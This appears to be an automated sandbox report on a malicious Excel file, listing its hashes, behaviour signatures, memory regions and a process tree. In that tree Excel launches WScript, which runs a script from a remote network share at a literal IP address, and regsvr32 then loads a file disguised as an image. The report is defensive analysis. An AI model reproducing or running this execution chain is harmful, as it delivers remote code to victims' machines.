Analysis

  • max time kernel
    134s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/02/2024, 16:41

General

  • Target

    NULLAMC.xlsx

  • Size

    56KB

  • MD5

    9ae220878200e8b787d7a39fccfb4839

  • SHA1

    d9e0d9a349b2fcb73fbd63783f90b953200c402b

  • SHA256

    7f83b7360a3906846bb6edaf4ba588a89c3ad2ce7a572b9a222fcb4535e02ea2

  • SHA512

    786c4f6c963e6f3c85298f84503e089f599db99dbf613ac0bc205cbfd9a5c15a04d34c1d14b390d641ee64aef52f38d2a42989abb143de24686edd8f228b1efb

  • SSDEEP

    1536:mAToOEjzAw7Y2r7DUsV4XzY9t3jSagJYw8TE3Jnh:FoOAcw7nXDUsOjm3jTxY1h

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\NULLAMC.xlsx"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "\\85.195.115.20\share\1.js"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:776
      • C:\Windows\System32\regsvr32.exe
        regsvr32 SH.jpg
        3⤵
          PID:3660

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/2388-0-0x00007FF7F2C90000-0x00007FF7F2CA0000-memory.dmp

            Filesize

            64KB

          • memory/2388-1-0x00007FF7F2C90000-0x00007FF7F2CA0000-memory.dmp

            Filesize

            64KB

          • memory/2388-2-0x00007FF7F2C90000-0x00007FF7F2CA0000-memory.dmp

            Filesize

            64KB

          • memory/2388-3-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-4-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-5-0x00007FF7F2C90000-0x00007FF7F2CA0000-memory.dmp

            Filesize

            64KB

          • memory/2388-8-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-7-0x00007FF7F2C90000-0x00007FF7F2CA0000-memory.dmp

            Filesize

            64KB

          • memory/2388-9-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-10-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-11-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-12-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-6-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-13-0x00007FF7F04E0000-0x00007FF7F04F0000-memory.dmp

            Filesize

            64KB

          • memory/2388-14-0x00007FF7F04E0000-0x00007FF7F04F0000-memory.dmp

            Filesize

            64KB

          • memory/2388-15-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-17-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-16-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-19-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-18-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-20-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-21-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-22-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-23-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-36-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB

          • memory/2388-37-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

            Filesize

            2.0MB